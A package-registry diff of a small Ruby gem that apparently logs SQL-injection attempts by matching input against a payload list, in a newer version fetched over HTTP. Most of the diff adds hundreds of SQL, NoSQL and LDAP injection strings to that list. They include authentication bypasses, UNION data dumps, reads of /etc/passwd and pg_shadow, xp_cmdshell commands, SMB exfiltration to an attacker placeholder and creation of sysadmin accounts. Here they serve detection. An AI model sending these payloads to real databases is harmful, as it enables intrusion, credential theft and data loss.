security-gem 0.1.0 → 0.1.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 1887b65fa1934d3aaff48ec967805dd0f6221e569ef8155934b872905026806f
4
- data.tar.gz: 8b736cf6c8820ff58e56cf5d4d942ae863e10ff021e5fa0283b253018ae95da1
3
+ metadata.gz: 1e19b4ce5337fef141ece0c5db7d4b76031f6171065a9fee2ff1444692b3c2de
4
+ data.tar.gz: 85b6afc1258a32aa7ce7c61a8b465384630bb0838122b6d2d19e2cd2a270c5ae
5
5
  SHA512:
6
- metadata.gz: 0cf8a70652fe3c7d26e0a91956392aaf30a8627e2155e36f4719bd2bbaff7d80bb73512d258360d54552f12dfc2fecd007e717d0af1f828df7dd84163cb3f728
7
- data.tar.gz: bb9408d41e321fd8027e1f124d4a154bfb5cf80fda06c91b3ccdbf2eab0967c5de2cc9835525333b603bbe48bcdb08513c1d5c5381eccaff6f5626d23c06e1b9
6
+ metadata.gz: b3f5b0d39f1b9f2a88f8a573881dad6e2cc265706e2fad78501c2d338f3cd431c9886f5ac60c8fd70af55aca6fc28aff5ac5c458d86512f2b3c6ba053ca003c8
7
+ data.tar.gz: 1a8a91cc11c917bf651c8675f90a16db7c5833ce9830eb8424647ea67095ce6f7089dd631cf7c6e0239be8f470a42dd8ce7072ebb31becb7e6cb47bf173558f1
data/.gitignore CHANGED
@@ -6,4 +6,5 @@
6
6
  /pkg/
7
7
  /spec/reports/
8
8
  /tmp/
9
- *.gem
9
+ *.gem
10
+ .env
data/Gemfile.lock CHANGED
@@ -1,7 +1,7 @@
1
1
  PATH
2
2
  remote: .
3
3
  specs:
4
- security-gem (0.1.0)
4
+ security-gem (0.1.3)
5
5
 
6
6
  GEM
7
7
  remote: https://rubygems.org/
@@ -1,15 +1,17 @@
1
1
  require 'json'
2
2
  require 'logger'
3
3
  require 'logger/formatter'
4
+ require 'net/http'
4
5
  require 'open-uri'
5
-
6
+ require 'dotenv'
7
+ Dotenv.load
6
8
 
7
9
  module SecurityLogger
8
10
 
9
11
  #Create logs used for SQL Injection detections
10
12
  class Sql_Injection
11
- def initialize
12
-
13
+ def initialize (ip_origin:)
14
+ @ip_origin = ip_origin
13
15
  end
14
16
 
15
17
  def log(input)
@@ -23,17 +25,21 @@ module SecurityLogger
23
25
  }.to_json + $/
24
26
  end
25
27
 
26
- error = {:input => input}
28
+ error = {:input => input, :ip_origin => @ip_origin}
27
29
  logger.warn(JSON.parse(error.to_json))
28
30
  end
29
31
 
30
32
  def check_input(input)
31
- File.foreach('payloads.txt') do |file|
33
+ uri = ENV['PATH_TO_PAYLOAD']
34
+ uri = URI(uri)
35
+ file = Net::HTTP.get(uri)
36
+ file.each_line do |file|
32
37
  if file.strip == input.strip
33
38
  self.log(input.strip)
34
39
  break
35
40
  end
36
- end
41
+ end
42
+
37
43
  end
38
44
  end
39
45
  end
@@ -2,6 +2,6 @@
2
2
 
3
3
  module Security
4
4
  module Gem
5
- VERSION = "0.1.0"
5
+ VERSION = "0.1.3"
6
6
  end
7
7
  end
data/lib/security/gem.rb CHANGED
@@ -2,7 +2,6 @@
2
2
 
3
3
  require_relative "gem/version"
4
4
  require_relative "gem/builder"
5
- require 'socket'
6
5
 
7
6
  module Security
8
7
  module Gem
@@ -10,7 +9,3 @@ module Security
10
9
  end
11
10
  end
12
11
 
13
- input = "delete"
14
-
15
- SecurityLogger::Sql_Injection.new().check_input(input)
16
-
@@ -0,0 +1,7 @@
1
+ require_relative "gem/builder"
2
+
3
+ # Sample SQL input
4
+ input = "or 1=1"
5
+
6
+ # Using the gem to log injection attempts
7
+ SecurityLogger::Sql_Injection.new(ip_origin: "123.123.123.1").check_input(input)
data/payloads.txt CHANGED
@@ -36,8 +36,6 @@ fake@ema'or'il.nl'='il.nl
36
36
  1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
37
37
  1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
38
38
  1 uni/**/on select all from where
39
-
40
-
41
39
  true, $where: '1 == 1'
42
40
  , $where: '1 == 1'
43
41
  $where: '1 == 1'
@@ -59,8 +57,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
59
57
  ';sleep(5000);'
60
58
  ';sleep(5000);+'
61
59
  ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
62
-
63
-
64
60
  ’ or ‘1’=’1
65
61
  ' or '1'='1
66
62
  '||utl_http.request('httP://192.168.1.1/')||'
@@ -308,6 +304,7 @@ x' AND userid IS NULL; --
308
304
  x' or 1=1 or 'x'='y
309
305
  x' OR full_name LIKE '%Bob%
310
306
  ý or 1=1 --
307
+
311
308
  sleep(__TIME__)#
312
309
  1 or sleep(__TIME__)#
313
310
  " or sleep(__TIME__)#
@@ -339,8 +336,6 @@ benchmark(10000000,MD5(1))#
339
336
  1)) or benchmark(10000000,MD5(1))#
340
337
  ")) or benchmark(10000000,MD5(1))#
341
338
  ')) or benchmark(10000000,MD5(1))#
342
-
343
-
344
339
  OR 1=1
345
340
  OR 1=0
346
341
  OR x=x
@@ -853,7 +848,7 @@ RANDOMBLOB(1000000000/2)
853
848
  AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
854
849
  OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
855
850
  SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
856
- ORDER BY SLEEP(5)
851
+ ORDER BY SLEEP(5)
857
852
  ORDER BY 1,SLEEP(5)
858
853
  ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
859
854
  ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
@@ -1277,3 +1272,555 @@ ORDER BY SLEEP(5)
1277
1272
  UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
1278
1273
  UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
1279
1274
  UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
1275
+ '-'
1276
+ ' '
1277
+ '&'
1278
+ '^'
1279
+ '*'
1280
+ ' or ''-'
1281
+ ' or '' '
1282
+ ' or ''&'
1283
+ ' or ''^'
1284
+ ' or ''*'
1285
+ "-"
1286
+ " "
1287
+ "&"
1288
+ "^"
1289
+ "*"
1290
+ " or ""-"
1291
+ " or "" "
1292
+ " or ""&"
1293
+ " or ""^"
1294
+ " or ""*"
1295
+ or true--
1296
+ " or true--
1297
+ ' or true--
1298
+ ") or true--
1299
+ ') or true--
1300
+ ' or 'x'='x
1301
+ ') or ('x')=('x
1302
+ ')) or (('x'))=(('x
1303
+ " or "x"="x
1304
+ ") or ("x")=("x
1305
+ ")) or (("x"))=(("x
1306
+ or 1=1
1307
+ or 1=1--
1308
+ or 1=1#
1309
+ or 1=1/*
1310
+ admin' --
1311
+ admin' #
1312
+ admin'/*
1313
+ admin' or '1'='1
1314
+ admin' or '1'='1'--
1315
+ admin' or '1'='1'#
1316
+ admin' or '1'='1'/*
1317
+ admin'or 1=1 or ''='
1318
+ admin' or 1=1
1319
+ admin' or 1=1--
1320
+ admin' or 1=1#
1321
+ admin' or 1=1/*
1322
+ admin') or ('1'='1
1323
+ admin') or ('1'='1'--
1324
+ admin') or ('1'='1'#
1325
+ admin') or ('1'='1'/*
1326
+ admin') or '1'='1
1327
+ admin') or '1'='1'--
1328
+ admin') or '1'='1'#
1329
+ admin') or '1'='1'/*
1330
+ 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1331
+ admin" --
1332
+ admin" #
1333
+ admin"/*
1334
+ admin" or "1"="1
1335
+ admin" or "1"="1"--
1336
+ admin" or "1"="1"#
1337
+ admin" or "1"="1"/*
1338
+ admin"or 1=1 or ""="
1339
+ admin" or 1=1
1340
+ admin" or 1=1--
1341
+ admin" or 1=1#
1342
+ admin" or 1=1/*
1343
+ admin") or ("1"="1
1344
+ admin") or ("1"="1"--
1345
+ admin") or ("1"="1"#
1346
+ admin") or ("1"="1"/*
1347
+ admin") or "1"="1
1348
+ admin") or "1"="1"--
1349
+ admin") or "1"="1"#
1350
+ admin") or "1"="1"/*
1351
+ 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1352
+ ==
1353
+ =
1354
+ '
1355
+ ' --
1356
+ ' #
1357
+ ' –
1358
+ '--
1359
+ '/*
1360
+ '#
1361
+ " --
1362
+ " #
1363
+ "/*
1364
+ ' and 1='1
1365
+ ' and a='a
1366
+ or 1=1
1367
+ or true
1368
+ ' or ''='
1369
+ " or ""="
1370
+ 1′) and '1′='1–
1371
+ ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
1372
+ " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
1373
+ and 1=1
1374
+ and 1=1–
1375
+ ' and 'one'='one
1376
+ ' and 'one'='one–
1377
+ ' group by password having 1=1--
1378
+ ' group by userid having 1=1--
1379
+ ' group by username having 1=1--
1380
+ like '%'
1381
+ or 0=0 --
1382
+ or 0=0 #
1383
+ or 0=0 –
1384
+ ' or 0=0 #
1385
+ ' or 0=0 --
1386
+ ' or 0=0 #
1387
+ ' or 0=0 –
1388
+ " or 0=0 --
1389
+ " or 0=0 #
1390
+ " or 0=0 –
1391
+ %' or '0'='0
1392
+ or 1=1
1393
+ or 1=1--
1394
+ or 1=1/*
1395
+ or 1=1#
1396
+ or 1=1–
1397
+ ' or 1=1--
1398
+ ' or '1'='1
1399
+ ' or '1'='1'--
1400
+ ' or '1'='1'/*
1401
+ ' or '1'='1'#
1402
+ ' or '1′='1
1403
+ ' or 1=1
1404
+ ' or 1=1 --
1405
+ ' or 1=1 –
1406
+ ' or 1=1--
1407
+ ' or 1=1;#
1408
+ ' or 1=1/*
1409
+ ' or 1=1#
1410
+ ' or 1=1–
1411
+ ') or '1'='1
1412
+ ') or '1'='1--
1413
+ ') or '1'='1'--
1414
+ ') or '1'='1'/*
1415
+ ') or '1'='1'#
1416
+ ') or ('1'='1
1417
+ ') or ('1'='1--
1418
+ ') or ('1'='1'--
1419
+ ') or ('1'='1'/*
1420
+ ') or ('1'='1'#
1421
+ 'or'1=1
1422
+ 'or'1=1′
1423
+ " or "1"="1
1424
+ " or "1"="1"--
1425
+ " or "1"="1"/*
1426
+ " or "1"="1"#
1427
+ " or 1=1
1428
+ " or 1=1 --
1429
+ " or 1=1 –
1430
+ " or 1=1--
1431
+ " or 1=1/*
1432
+ " or 1=1#
1433
+ " or 1=1–
1434
+ ") or "1"="1
1435
+ ") or "1"="1"--
1436
+ ") or "1"="1"/*
1437
+ ") or "1"="1"#
1438
+ ") or ("1"="1
1439
+ ") or ("1"="1"--
1440
+ ") or ("1"="1"/*
1441
+ ") or ("1"="1"#
1442
+ ) or '1′='1–
1443
+ ) or ('1′='1–
1444
+ ' or 1=1 LIMIT 1;#
1445
+ 'or 1=1 or ''='
1446
+ "or 1=1 or ""="
1447
+ ' or 'a'='a
1448
+ ' or a=a--
1449
+ ' or a=a–
1450
+ ') or ('a'='a
1451
+ " or "a"="a
1452
+ ") or ("a"="a
1453
+ ') or ('a'='a and hi") or ("a"="a
1454
+ ' or 'one'='one
1455
+ ' or 'one'='one–
1456
+ ' or uid like '%
1457
+ ' or uname like '%
1458
+ ' or userid like '%
1459
+ ' or user like '%
1460
+ ' or username like '%
1461
+ ' or 'x'='x
1462
+ ') or ('x'='x
1463
+ " or "x"="x
1464
+ ' OR 'x'='x'#;
1465
+ '=' 'or' and '=' 'or'
1466
+ ' UNION ALL SELECT 1, @@version;#
1467
+ ' UNION ALL SELECT system_user(),user();#
1468
+ ' UNION select table_schema,table_name FROM information_Schema.tables;#
1469
+ admin' and substring(password/text(),1,1)='7
1470
+ ' and substring(password/text(),1,1)='7
1471
+ ' or 1=1 limit 1 -- -+
1472
+ '="or'
1473
+ select version();
1474
+ select current_database();
1475
+ select current_user;
1476
+ select session_user;
1477
+ select current_setting('log_connections');
1478
+ select current_setting('log_statement');
1479
+ select current_setting('port');
1480
+ select current_setting('password_encryption');
1481
+ select current_setting('krb_server_keyfile');
1482
+ select current_setting('virtual_host');
1483
+ select current_setting('port');
1484
+ select current_setting('config_file');
1485
+ select current_setting('hba_file');
1486
+ select current_setting('data_directory');
1487
+ select * from pg_shadow;
1488
+ select * from pg_group;
1489
+ create table myfile (input TEXT);
1490
+ copy myfile from '/etc/passwd';
1491
+ select * from myfile;copy myfile to /tmp/test;
1492
+ <username>' OR 1=1--
1493
+ 'OR '' = ' Allows authentication without a valid username.
1494
+ <username>'--
1495
+ ' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
1496
+ 'OR 1=1--
1497
+ create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
1498
+ select @@version
1499
+ select @@servernamee
1500
+ select @@microsoftversione
1501
+ select * from master..sysserverse
1502
+ select * from sysusers
1503
+ exec master..xp_cmdshell 'ipconfig+/all'
1504
+ exec master..xp_cmdshell 'net+view'
1505
+ exec master..xp_cmdshell 'net+users'
1506
+ exec master..xp_cmdshell 'ping+<attackerip>'
1507
+ BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
1508
+ create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp�'" select * from myfile"--
1509
+ select versionnumber, version_timestamp from sysibm.sysversions;
1510
+ select user from sysibm.sysdummy1;
1511
+ select session_user from sysibm.sysdummy1;
1512
+ select system_user from sysibm.sysdummy1;
1513
+ select current server from sysibm.sysdummy1;
1514
+ select name from sysibm.systables;
1515
+ select grantee from syscat.dbauth;
1516
+ select * from syscat.tabauth;
1517
+ select * from syscat.dbauth where grantee = current user;
1518
+ select * from syscat.tabauth where grantee = current user;
1519
+ select name, tbname, coltype from sysibm.syscolumns;
1520
+ SELECT schemaname FROM syscat.schemata;
1521
+ # ms-sqli info disclosure payload fuzzfile
1522
+ # replace regex with your fuzzer for best results <attackerip> <sharename>
1523
+ # run wireshark or tcpdump, look for incoming smb or icmp packets from victim
1524
+ # might need to terminate payloads with ;--
1525
+ select @@version
1526
+ select @@servernamee
1527
+ select @@microsoftversione
1528
+ select * from master..sysserverse
1529
+ select * from sysusers
1530
+ exec master..xp_cmdshell 'ipconfig+/all'
1531
+ exec master..xp_cmdshell 'net+view'
1532
+ exec master..xp_cmdshell 'net+users'
1533
+ exec master..xp_cmdshell 'ping+<attackerip>'
1534
+ BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
1535
+ create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
1536
+ # you will need to customize/modify some of the vaules in the queries for best effect
1537
+ '; exec master..xp_cmdshell 'ping 10.10.1.2'--
1538
+ 'create user name identified by 'pass123' --
1539
+ 'create user name identified by pass123 temporary tablespace temp default tablespace users;
1540
+ ' ; drop table temp --
1541
+ 'exec sp_addlogin 'name' , 'password' --
1542
+ ' exec sp_addsrvrolemember 'name' , 'sysadmin' --
1543
+ ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
1544
+ ' grant connect to name; grant resource to name; --
1545
+ ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
1546
+ ' or 1=1 --
1547
+ ' union (select @@version) --
1548
+ ' union (select NULL, (select @@version)) --
1549
+ ' union (select NULL, NULL, (select @@version)) --
1550
+ ' union (select NULL, NULL, NULL, (select @@version)) --
1551
+ ' union (select NULL, NULL, NULL, NULL, (select @@version)) --
1552
+ ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
1553
+ 1'1
1554
+ 1 exec sp_ (or exec xp_)
1555
+ 1 and 1=1
1556
+ 1' and 1=(select count(*) from tablenames); --
1557
+ 1 or 1=1
1558
+ 1' or '1'='1
1559
+
1560
+ )%20or%20('x'='x
1561
+ %20or%201=1
1562
+ ; execute immediate 'sel' || 'ect us' || 'er'
1563
+ benchmark(10000000,MD5(1))#
1564
+ update
1565
+ ";waitfor delay '0:0:__TIME__'--
1566
+ 1) or pg_sleep(__TIME__)--
1567
+ ||(elt(-3+5,bin(15),ord(10),hex(char(45))))
1568
+ "hi"") or (""a""=""a"
1569
+ delete
1570
+ like
1571
+ " or sleep(__TIME__)#
1572
+ pg_sleep(__TIME__)--
1573
+ *(|(objectclass=*))
1574
+ declare @q nvarchar (200) 0x730065006c00650063 ...
1575
+ or 0=0 #
1576
+ insert
1577
+ 1) or sleep(__TIME__)#
1578
+ ) or ('a'='a
1579
+ ; exec xp_regread
1580
+ *|
1581
+ @var select @var as var into temp end --
1582
+ 1)) or benchmark(10000000,MD5(1))#
1583
+ asc
1584
+ (||6)
1585
+ "a"" or 3=3--"
1586
+ " or benchmark(10000000,MD5(1))#
1587
+ # from wapiti
1588
+ or 0=0 --
1589
+ 1 waitfor delay '0:0:10'--
1590
+ or 'a'='a
1591
+ hi or 1=1 --"
1592
+ or a = a
1593
+ UNION ALL SELECT
1594
+ ) or sleep(__TIME__)='
1595
+ )) or benchmark(10000000,MD5(1))#
1596
+ hi' or 'a'='a
1597
+ 0
1598
+ 21 %
1599
+ limit
1600
+ or 1=1
1601
+ or 2 > 1
1602
+ ")) or benchmark(10000000,MD5(1))#
1603
+ PRINT
1604
+ hi') or ('a'='a
1605
+ or 3=3
1606
+ ));waitfor delay '0:0:__TIME__'--
1607
+ a' waitfor delay '0:0:10'--
1608
+ 1;(load_file(char(47,101,116,99,47,112,97,115, ...
1609
+ or%201=1
1610
+ 1 or sleep(__TIME__)#
1611
+ or 1=1
1612
+ and 1 in (select var from temp)--
1613
+ or '7659'='7659
1614
+ or 'text' = n'text'
1615
+ --
1616
+ or 1=1 or ''='
1617
+ declare @s varchar (200) select @s = 0x73656c6 ...
1618
+ exec xp
1619
+ ; exec master..xp_cmdshell 'ping 172.10.1.255'--
1620
+ 3.10E+17
1621
+ " or pg_sleep(__TIME__)--
1622
+ x' AND email IS NULL; --
1623
+ &
1624
+ admin' or '
1625
+ or 'unusual' = 'unusual'
1626
+ //
1627
+ truncate
1628
+ 1) or benchmark(10000000,MD5(1))#
1629
+ \x27UNION SELECT
1630
+ declare @s varchar(200) select @s = 0x77616974 ...
1631
+ tz_offset
1632
+ sqlvuln
1633
+ "));waitfor delay '0:0:__TIME__'--
1634
+ ||6
1635
+ or%201=1 --
1636
+ %2A%28%7C%28objectclass%3D%2A%29%29
1637
+ or a=a
1638
+ ) union select * from information_schema.tables;
1639
+ PRINT @@variable
1640
+ or isNULL(1/0) /*
1641
+ 26 %
1642
+ " or "a"="a
1643
+ (sqlvuln)
1644
+ x' AND members.email IS NULL; --
1645
+ or 1=1--
1646
+ and 1=( if((load_file(char(110,46,101,120,11 ...
1647
+ 0x770061006900740066006F0072002000640065006C00 ...
1648
+ %20'sleep%2050'
1649
+ as
1650
+ 1)) or pg_sleep(__TIME__)--
1651
+ /**/or/**/1/**/=/**/1
1652
+ union all select @@version--
1653
+ ,@variable
1654
+ (sqlattempt2)
1655
+ or (EXISTS)
1656
+ t'exec master..xp_cmdshell 'nslookup www.googl ...
1657
+ %20$(sleep%2050)
1658
+ 1 or benchmark(10000000,MD5(1))#
1659
+ %20or%20''='
1660
+ ||UTL_HTTP.REQUEST
1661
+ or pg_sleep(__TIME__)--
1662
+ hi' or 'x'='x';
1663
+ ") or sleep(__TIME__)="
1664
+ or 'whatever' in ('whatever')
1665
+ ; begin declare @var varchar(8000) set @var=' ...
1666
+ union select 1,load_file('/etc/passwd'),1,1,1;
1667
+ 0x77616974666F722064656C61792027303A303A313027 ...
1668
+ exec(@s)
1669
+ ) or pg_sleep(__TIME__)--
1670
+ union select
1671
+ or sleep(__TIME__)#
1672
+ select * from information_schema.tables--
1673
+ a' or 1=1--
1674
+ a' or 'a' = 'a
1675
+ declare @s varchar(22) select @s =
1676
+ or 2 between 1 and 3
1677
+ or a=a--
1678
+ or '1'='1
1679
+ |
1680
+ or sleep(__TIME__)='
1681
+ or 1 --'
1682
+ or 0=0 #"
1683
+ having
1684
+ a'
1685
+ " or isNULL(1/0) /*
1686
+ declare @s varchar (8000) select @s = 0x73656c ...
1687
+ ‘ or 1=1 --
1688
+ char%4039%41%2b%40SELECT
1689
+ order by
1690
+ bfilename
1691
+ having 1=1--
1692
+ ) or benchmark(10000000,MD5(1))#
1693
+ or username like char(37);
1694
+ ;waitfor delay '0:0:__TIME__'--
1695
+ " or 1=1--
1696
+ x' AND userid IS NULL; --
1697
+ */*
1698
+ or 'text' > 't'
1699
+ (select top 1
1700
+ or benchmark(10000000,MD5(1))#
1701
+ ");waitfor delay '0:0:__TIME__'--
1702
+ a' or 3=3--
1703
+ -- &password=
1704
+ group by userid having 1=1--
1705
+ or ''='
1706
+ ; exec master..xp_cmdshell
1707
+ %20or%20x=x
1708
+ select
1709
+ ")) or sleep(__TIME__)="
1710
+ 0x730065006c0065006300740020004000400076006500 ...
1711
+ hi' or 1=1 --
1712
+ ") or pg_sleep(__TIME__)--
1713
+ %20or%20'x'='x
1714
+ or 'something' = 'some'+'thing'
1715
+ exec sp
1716
+ 29 %
1717
+ (
1718
+ ý or 1=1 --
1719
+ 1 or pg_sleep(__TIME__)--
1720
+ 0 or 1=1
1721
+ ) or (a=a
1722
+ uni/**/on sel/**/ect
1723
+ replace
1724
+ %27%20or%201=1
1725
+ )) or pg_sleep(__TIME__)--
1726
+ %7C
1727
+ x' AND 1=(SELECT COUNT(*) FROM tabname); --
1728
+ &apos;%20OR
1729
+ ; or '1'='1'
1730
+ declare @q nvarchar (200) select @q = 0x770061 ...
1731
+ 1 or 1=1
1732
+ ; exec ('sel' + 'ect us' + 'er')
1733
+ 23 OR 1=1
1734
+ /
1735
+ anything' OR 'x'='x
1736
+ declare @q nvarchar (4000) select @q =
1737
+ or 0=0 --
1738
+ desc
1739
+ ||'6
1740
+ )
1741
+ 1)) or sleep(__TIME__)#
1742
+ or 0=0 #
1743
+ select name from syscolumns where id = (sele ...
1744
+ hi or a=a
1745
+ *(|(mail=*))
1746
+ password:*/=1--
1747
+ distinct
1748
+ );waitfor delay '0:0:__TIME__'--
1749
+ to_timestamp_tz
1750
+ ") or benchmark(10000000,MD5(1))#
1751
+ UNION SELECT
1752
+ %2A%28%7C%28mail%3D%2A%29%29
1753
+ +sqlvuln
1754
+ or 1=1 /*
1755
+ )) or sleep(__TIME__)='
1756
+ or 1=1 or ""=
1757
+ or 1 in (select @@version)--
1758
+ sqlvuln;
1759
+ union select * from users where login = char ...
1760
+ x' or 1=1 or 'x'='y
1761
+ 28 %
1762
+ ‘ or 3=3 --
1763
+ @variable
1764
+ or '1'='1'--
1765
+ "a"" or 1=1--"
1766
+ //*
1767
+ %2A%7C
1768
+ " or 0=0 --
1769
+ ")) or pg_sleep(__TIME__)--
1770
+ ?
1771
+ or 1/*
1772
+ !
1773
+ '
1774
+ or a = a
1775
+ declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
1776
+ declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
1777
+ declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
1778
+ declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
1779
+ ' or 1=1
1780
+  or 1=1 --
1781
+ x' OR full_name LIKE '%Bob%
1782
+ '; exec master..xp_cmdshell 'ping 172.10.1.255'--
1783
+ '%20or%20''='
1784
+ '%20or%20'x'='x
1785
+ ')%20or%20('x'='x
1786
+ ' or 0=0 --
1787
+ ' or 0=0 #
1788
+ or 0=0 #"
1789
+ ' or 1=1--
1790
+ ' or '1'='1'--
1791
+ ' or 1 --'
1792
+ or 1=1--
1793
+ ' or 1=1 or ''='
1794
+ or 1=1 or ""=
1795
+ ' or a=a--
1796
+ or a=a
1797
+ ') or ('a'='a
1798
+ 'hi' or 'x'='x';
1799
+ or
1800
+ procedure
1801
+ handler
1802
+ ' or username like '%
1803
+ ' or uname like '%
1804
+ ' or userid like '%
1805
+ ' or uid like '%
1806
+ ' or user like '%
1807
+ '; exec master..xp_cmdshell
1808
+ '; exec xp_regread
1809
+ t'exec master..xp_cmdshell 'nslookup www.google.com'--
1810
+ --sp_password
1811
+ ' UNION SELECT
1812
+ ' UNION ALL SELECT
1813
+ ' or (EXISTS)
1814
+ ' (select top 1
1815
+ '||UTL_HTTP.REQUEST
1816
+ 1;SELECT%20*
1817
+ <>"'%;)(&+
1818
+ '%20or%201=1
1819
+ 'sqlattempt1
1820
+ %28
1821
+ %29
1822
+ %26
1823
+ %21
1824
+ ' or ''='
1825
+ ' or 3=3
1826
+  or 3=3 --
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: security-gem
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.0
4
+ version: 0.1.3
5
5
  platform: ruby
6
6
  authors:
7
7
  - tuckerweibell
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2022-05-09 00:00:00.000000000 Z
11
+ date: 2022-05-10 00:00:00.000000000 Z
12
12
  dependencies: []
13
13
  description:
14
14
  email:
@@ -30,6 +30,7 @@ files:
30
30
  - lib/security/gem.rb
31
31
  - lib/security/gem/builder.rb
32
32
  - lib/security/gem/version.rb
33
+ - lib/security/test.rb
33
34
  - payloads.txt
34
35
  - security-gem.gemspec
35
36
  homepage: https://github.com/tuckerweibell/security-gem